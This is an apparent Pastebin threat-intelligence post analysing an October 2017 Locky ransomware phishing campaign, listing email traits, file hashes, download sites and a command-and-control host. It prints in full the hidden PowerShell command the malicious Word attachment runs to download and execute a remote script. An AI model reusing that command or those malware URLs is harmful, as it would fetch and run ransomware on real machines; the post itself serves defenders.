SHARE
TWEET

2017-10-19 Locky "Document / Invoice / Paper"

Racco42 Oct 19th, 2017 (edited) 935 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 2017-10-19: #locky email phishing camapign "Document / Documents / Invoice / Order / Paper / Receipt / Scan"
  2.  
  3. Email sample:
  4. -------------------------------------------------------------------------------------------------------------------------
  5. From: Jayne <Jayne.800@[REDACTED]>
  6. To: [REDACTED]
  7. Subject: Receipt
  8. Date: Tue, 24 Oct 2017 02:16:24 +0200
  9.  
  10. Attachment: DC000901.doc
  11. -------------------------------------------------------------------------------------------------------------------------
  12. - sender email is forged to be from same domain as recipient
  13. - subject is one of "Document", "Documents", "Invoice", "Order", "Paper", "Receipt", "Scan", "Scanned document" or "DC000<3-5 digits>.doc"
  14. - email body is empty
  15. - attached file "DC000<3-5digits>.doc" is a MS Word file exploiting a DDEAUTO feature which will try to execute the following command:
  16.  
  17. C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://pdj.co.id/hjergf76');powershell -e $e "
  18.  
  19. The command will download another (base64 encoded) powershell script from one of the locations:
  20. http://accessyouraudience.com/hjergf76
  21. http://missinglynxsystems.com/hjergf76
  22. http://pdj.co.id/hjergf76
  23. http://pragmaticinquiry.org/hjergf76
  24. http://vithos.de/hjergf76
  25.  
  26. The secondary script will download malware from one of the download sites and execute it.
  27.  
  28. Download sites
  29. http://deltasec.net/jnoiuy876g
  30. http://pac-provider.com/jnoiuy876g
  31. http://arkberg-design.fi/jnoiuy876g
  32. http://basedow-bilder.de/jnoiuy876g
  33. http://hair-select.jp/jnoiuy876g
  34.  
  35. Malware (loader):
  36. - SHA256: 3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2, MD5 a633ccbf2a9d299a06512319a0286777
  37. - VT: https://www.virustotal.com/en/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/1508450647/
  38. - HA: https://www.hybrid-analysis.com/sample/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2?environmentId=100
  39. - POSTs information to http://gdiscoun.org
  40. - loads the ransomware payload
  41.  
  42. Malware:
  43. - locky ransomware, offline .asasin variant
  44. - downloaded by loader from https://axtes.com/SLyhe6.enc
  45. - encoded on download: SHA256: ca4c7f0aaf3410497f9b4db1081ecaf5edfebf5acd69df88b975207bbaccfa5e, MD5: f2d1bbb9c5e9907434bcaa725861d847
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top